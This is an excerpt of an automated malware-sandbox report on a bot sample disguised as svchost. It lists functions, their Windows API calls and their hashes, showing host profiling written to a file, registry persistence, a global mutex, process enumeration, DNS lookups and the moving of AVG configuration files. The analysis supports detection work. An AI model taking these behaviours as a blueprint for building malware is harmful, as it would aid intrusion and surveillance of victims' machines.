Opcode Fuzzy Hash: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
Instruction Fuzzy Hash: 9611EBB25043105BC310EF55DC48A9BBBACEBD5360F00453AFE55A3290E734E949CBEA

Function 02D44800 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D44824
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D4482F
Process32First.KERNEL32 ref: 02D44855
StrStrIA.SHLWAPI(?,02D217FF), ref: 02D44870
Process32Next.KERNEL32(00000000,?), ref: 02D4487C
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D44898
CloseHandle.KERNEL32(00000000), ref: 02D448AA

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
String ID:
API String ID: 3955875343-0
Opcode ID: 80ecf71541aa282f515d27d036bf46e6cee66a1266cdf16e3e3dee640b6a13a3
Instruction ID: 3f9ab7d3c595fabbefb069bddf34359c683cbb9da04c4569b38d8b25d7b36a80
Opcode Fuzzy Hash: 80ecf71541aa282f515d27d036bf46e6cee66a1266cdf16e3e3dee640b6a13a3
Instruction Fuzzy Hash: 771190729043916FD310DE65A848BABBBE8EB85760F444A19FD5483380EB349D58CBE2

Function 02D22990 Relevance: 9.1, APIs: 6, Instructions: 87COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 02D229AF
exit.MSVCRT ref: 02D229BD
calloc.MSVCRT ref: 02D229C9
exit.MSVCRT ref: 02D229D6
free.MSVCRT(00000000,?,00000000,?,?,?), ref: 02D22A2A
free.MSVCRT(?), ref: 02D22A4E

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: callocexitfree
String ID:
API String ID: 3367576030-0
Opcode ID: f9a6e219a9df802f9b1fd3bc4b601f1a03169984f5dcdff23169de09c6e3e2b2
Instruction ID: fdbcb8b084dda74fb943c4dea7a32cc5f3e5cd16cfc58a019f695b7ae7b1bc05
Opcode Fuzzy Hash: f9a6e219a9df802f9b1fd3bc4b601f1a03169984f5dcdff23169de09c6e3e2b2
Instruction Fuzzy Hash: 402168B5A40319AFDB20CF58DC85AAB77A8EB98324F044529FE4597300E771ED14CBA1

Function 02D37B30 Relevance: 7.6, APIs: 5, Instructions: 68sleepsynchronizationCOMMON

Download Yara Rule

APIs

PathFindFileNameA.SHLWAPI(?), ref: 02D37B7A
FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02D37BB8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02D37BD3
FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02D37BDA
Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02D37C01

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
String ID:
API String ID: 433761119-0
Opcode ID: b2ccf767712fd401430522ec1ce11095b28bc85b29da306006bd8fc0ec878307
Instruction ID: a5d8495dacdb82b6e500d95532113f47aac724a206f96a67e743460f3b630215
Opcode Fuzzy Hash: b2ccf767712fd401430522ec1ce11095b28bc85b29da306006bd8fc0ec878307
Instruction Fuzzy Hash: DF21A87194061DD7F7139769EC58BEAB7B8AF15704F2445A5E84197380E7B0CD88CBA0

Function 02D37B56 Relevance: 7.6, APIs: 5, Instructions: 54sleepsynchronizationCOMMON

Download Yara Rule

APIs

PathFindFileNameA.SHLWAPI(?), ref: 02D37B7A
FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02D37BB8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02D37BD3
FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02D37BDA
Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02D37C01

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
String ID:
API String ID: 433761119-0
Opcode ID: d569f9891d3d20241c18b104482a76fcc5a706cdba5c18e6480fd75adaadf6af
Instruction ID: 89729019eda6470d33f8e7107591d04d8487f03227a60c0ed819ec2d29570200
Opcode Fuzzy Hash: d569f9891d3d20241c18b104482a76fcc5a706cdba5c18e6480fd75adaadf6af
Instruction Fuzzy Hash: 19119171940619DBEB22CB65DC98BDDB7B8AF14704F244594E84197380EBB0DE88CFA0

Function 02D26870 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D268A0

Part of subcall function 02D26750: memset.MSVCRT ref: 02D26772
Part of subcall function 02D26750: memset.MSVCRT ref: 02D26790
Part of subcall function 02D26750: lstrcpynA.KERNEL32(?,00000000,00000104,?,?,?,?,?,74DF0F10), ref: 02D267A9
Part of subcall function 02D26750: RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,?,?,74DF0F10), ref: 02D2681D
Part of subcall function 02D26750: RegSetValueExA.ADVAPI32(?,A1633BD9a,00000000,00000001,?,00000104,?,?,?,?,?,74DF0F10), ref: 02D26843
Part of subcall function 02D26750: RegCloseKey.ADVAPI32(?,?,?,?,?,74DF0F10), ref: 02D26863

GetProcessHeap.KERNEL32(00000000,?), ref: 02D268C7
HeapValidate.KERNEL32(00000000), ref: 02D268CA
GetProcessHeap.KERNEL32(00000000,?), ref: 02D268D7
HeapFree.KERNEL32(00000000), ref: 02D268DA

Part of subcall function 02D263B0: memset.MSVCRT ref: 02D263D8
Part of subcall function 02D263B0: DnsFlushResolverCache.DNSAPI ref: 02D263FC
Part of subcall function 02D263B0: gethostbyname.WS2_32(02D26C17), ref: 02D26406
Part of subcall function 02D263B0: GetTempPathA.KERNEL32(00000104,?), ref: 02D26420
Part of subcall function 02D263B0: GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02D26438
Part of subcall function 02D263B0: calloc.MSVCRT ref: 02D264D6
Part of subcall function 02D263B0: exit.MSVCRT ref: 02D264E5

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$memset$ProcessTemp$AdminCacheCloseFileFlushFreeNameOpenPathResolverUserValidateValuecallocexitgethostbynamelstrcpyn
String ID:
API String ID: 1054002843-0
Opcode ID: 4f1d3fcf272b3717fe210359c11521f31abb6269a781ea4adf23acfa5a052e44
Instruction ID: 79179c121b38468650754ad0fb4989d013c01d406b468d2d530a59f60023ce57
Opcode Fuzzy Hash: 4f1d3fcf272b3717fe210359c11521f31abb6269a781ea4adf23acfa5a052e44
Instruction Fuzzy Hash: B7F0F4739813346ADA102AA1F80CFCA779DDB90766F000422F904C6380D7BADC68CAF0

Function 00402430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402448
MoveFileA.KERNEL32(?,?), ref: 0040250F

Strings

\AVG\AVG9\dfncfg.dat, xrefs: 00402488
\AVG\AVG9\dfmcfg.dat, xrefs: 004024CC

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FileFolderMovePath
String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
API String ID: 1404575960-1083204512
Opcode ID: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
Instruction ID: 2817f7f5a2ee45723a7bffe92fbd27ee54b29152b6db55fc9663a9b726faa6ae
Opcode Fuzzy Hash: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
Instruction Fuzzy Hash: 172151B45042448FC719CF14EA98B92BBF1BB88300F1581F9DA99A73B2D6B0D944CF98

Function 02D23750 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49synchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D2377E
CreateMutexA.KERNEL32(00000000,00000000,?,74DF0A60,7604DB30), ref: 02D237C5

Strings

A1633C6Ba, xrefs: 02D23783
Global\, xrefs: 02D23759

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CreateMutexmemset
String ID: A1633C6Ba$Global\
API String ID: 3892072029-1916278781
Opcode ID: 40dc633c9afc7f6982c848af85a4e9510df47e0a5413a61249975ff1ed7a5ff3
Instruction ID: 69bfbd73d16167a6b9dbdee0135adc63925ef6e0adf3e06d1d38ecb9c75c4081
Opcode Fuzzy Hash: 40dc633c9afc7f6982c848af85a4e9510df47e0a5413a61249975ff1ed7a5ff3
Instruction Fuzzy Hash: 74019EB1E401195BDB24C938AC19BFB77E4EB91300F4042E5E9C9DB380FAB15D85CB80

Function 02D44550 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76ECFFB0,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D4457D
GetProcessTimes.KERNEL32(00000000,?,?,?,02D373C7,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D4459A
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D445B2
CloseHandle.KERNEL32(00000000,?,?,?,?,?,02D373C7,00000000), ref: 02D445C3

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleProcess$CloseInformationOpenTimes
String ID:
API String ID: 3228293703-0
Opcode ID: b7576505e55a94b5dbef60322a07fd9ece058867a8b4c3b430338d248d949798
Instruction ID: 117890740f3445d5e56e08ca85fe33bda4f6c14ca1c1412ad58ea30883ed0a1a
Opcode Fuzzy Hash: b7576505e55a94b5dbef60322a07fd9ece058867a8b4c3b430338d248d949798
Instruction Fuzzy Hash: 5511F1B1D00219ABCF00CF96D9889EFFBFCEF98254F54815AE905A7240D7759A45CBA0

Function 02D26CA4 Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,02D26870,00000000,00000000,00000000), ref: 02D26C6E
WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,-80000001), ref: 02D26C9A
GetHandleInformation.KERNEL32(?,00000000), ref: 02D26CC7
CloseHandle.KERNEL32(?), ref: 02D26CD8

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseCreateInformationMultipleObjectsThreadWait
String ID:
API String ID: 3242810915-0
Opcode ID: 5bc9c2403b3fbb04eebbf3c98d6c2011d516dc015a40e76554cb33020c959258
Instruction ID: f718790538f562ad88d10f08e7906c2899f66e11bceaca24f4850ea28393c454
Opcode Fuzzy Hash: 5bc9c2403b3fbb04eebbf3c98d6c2011d516dc015a40e76554cb33020c959258
Instruction Fuzzy Hash: 0211E5B0940370AAE7216F509C887AC7A6CEB2471CF202564E906623C0CB71DD99E6F1

Function 02D37220 Relevance: 6.0, APIs: 4, Instructions: 27threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,02D367D0,00000000,00000000,00000000), ref: 02D37234
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3724C
CloseHandle.KERNEL32(00000000), ref: 02D3725D
ExitThread.KERNEL32 ref: 02D37265

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateExitInformation
String ID:
API String ID: 4233414108-0
Opcode ID: 76c0942a4cd9e54bbcb9c609c9c87a236f8e7a2dd6b73add8a4bc1b6b870f85f
Instruction ID: 3783288450ae7379de129aec427c1c7bb1d8a9398f36de158bee075457a671f2
Opcode Fuzzy Hash: 76c0942a4cd9e54bbcb9c609c9c87a236f8e7a2dd6b73add8a4bc1b6b870f85f
Instruction Fuzzy Hash: 55E06D70E89714BBF3214A90EC0EF5E7BA8BB05B45F644440FA01A63C1D7F0AE4486B4

Function 02D22A60 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 02D22A6F
exit.MSVCRT ref: 02D22A80
free.MSVCRT(00000000,00000000,00000000,?,?,?,?,02D22E41,00000000,00000000), ref: 02D22AC3

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: callocexitfree
String ID:
API String ID: 3367576030-0
Opcode ID: 65fcd995527c31f5b937de50f6087a27ad0c3e36349f500f92e36fc5f97f1f9f
Instruction ID: f9a7a01704919fa777aef1d12a1145efe2f74ec9376dfd624c4e85bb3eebb139
Opcode Fuzzy Hash: 65fcd995527c31f5b937de50f6087a27ad0c3e36349f500f92e36fc5f97f1f9f
Instruction Fuzzy Hash: CF018F75644228ABD7208F48EC89FAB7BA9EFA8764F400518FE0587301C770EC55CAF1

Function 0040217A Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000), ref: 0040218C

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
Instruction ID: d0e749ada70b16f267b0096a5882ad0ed8cb575b22d8ef64c6acb779e6c27845
Opcode Fuzzy Hash: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
Instruction Fuzzy Hash: B6D05E76E05729CBCB20DF94A5052AEF730FB45731F0083AADE247338083351C118AD4

Non-executed Functions

Function 02D248C0 Relevance: 325.1, APIs: 164, Strings: 21, Instructions: 1339filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,02D7D3A4,75B05CE0), ref: 02D249F4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?), ref: 02D24A14
LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D24A25
WriteFile.KERNEL32(00000000,{BotVer: ,00000009,?,00000000), ref: 02D24A35
UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02D24A46
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24A5A
LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02D24A67
WriteFile.KERNEL32(00000000,4.2.5,00000005,00000000,00000000), ref: 02D24A77
UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02D24A88
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24A9C
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24AA9
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24AB9
UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02D24ACA
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D24ADE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24AF2
LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02D24AFF
WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02D24B0F
UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02D24B20
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24B4C
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24B5B
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24B6F
UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02D24B82
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24B96
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24BA3
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24BB3
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24BC4
GetUserNameA.ADVAPI32(?,00000104), ref: 02D24BD5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24BE9
LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D24BF6
WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02D24C06
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D24C17
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24C42
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24C51
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24C65
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24C78
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24C8C
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24C99
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24CA9
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24CBA
GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02D24CD1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24CE5
LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24CF2
WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02D24D02
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24D13
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24D3E
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24D4D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24D61
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24D74
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24D88
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24D95
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24DA5
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24DB6
GetSystemDefaultLangID.KERNEL32 ref: 02D24DBC
memset.MSVCRT ref: 02D24DD6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24E43
LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D24E50
WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 02D24E60
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02D24E71
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24E9C
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24EAB
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24EBF
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24ED2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24EE6
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24EF3
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24F03
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24F14
GetDC.USER32(00000000), ref: 02D24F1E
GetDeviceCaps.GDI32(00000000), ref: 02D24F25
GetSystemMetrics.USER32(00000001), ref: 02D24F2E
GetSystemMetrics.USER32(00000000), ref: 02D24F37
_snprintf.MSVCRT ref: 02D24F4F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24F66
LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D24F73
WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 02D24F83
UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D24F94
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24FBF
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24FCE
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24FE2
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D24FF5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25009
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25016
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25026
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25037
GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02D25057
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2506B
LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02D25078
WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 02D25088
UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02D25099
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D250C4
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D250D3
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D250E7
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D250FA
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2510E
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D2511B
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D2512B
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D2513C
GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02D2515C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25170
LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02D2517D
WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 02D2518D
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02D2519E
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D251CC
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D251DB
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D251EF
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D25202
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25216
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25223
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25233
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25244
GetTimeZoneInformation.KERNEL32(?), ref: 02D25251
_snprintf.MSVCRT ref: 02D252B2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D252C9
LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02D252D6
WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02D252E6
UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02D252F7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25322
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D25331
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D25345
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D25358
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2536C
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25379
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25389
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D2539A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D253AE
LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D253BB
WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 02D253CB
UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02D253DC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2541C
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D2542B
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D2543C
UnlockFile.KERNEL32(00000000,02D23CCD,00000000,00000000,00000000), ref: 02D2544F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25463
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25470
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25480
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25491
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D254A3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D254B7
LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02D254C4
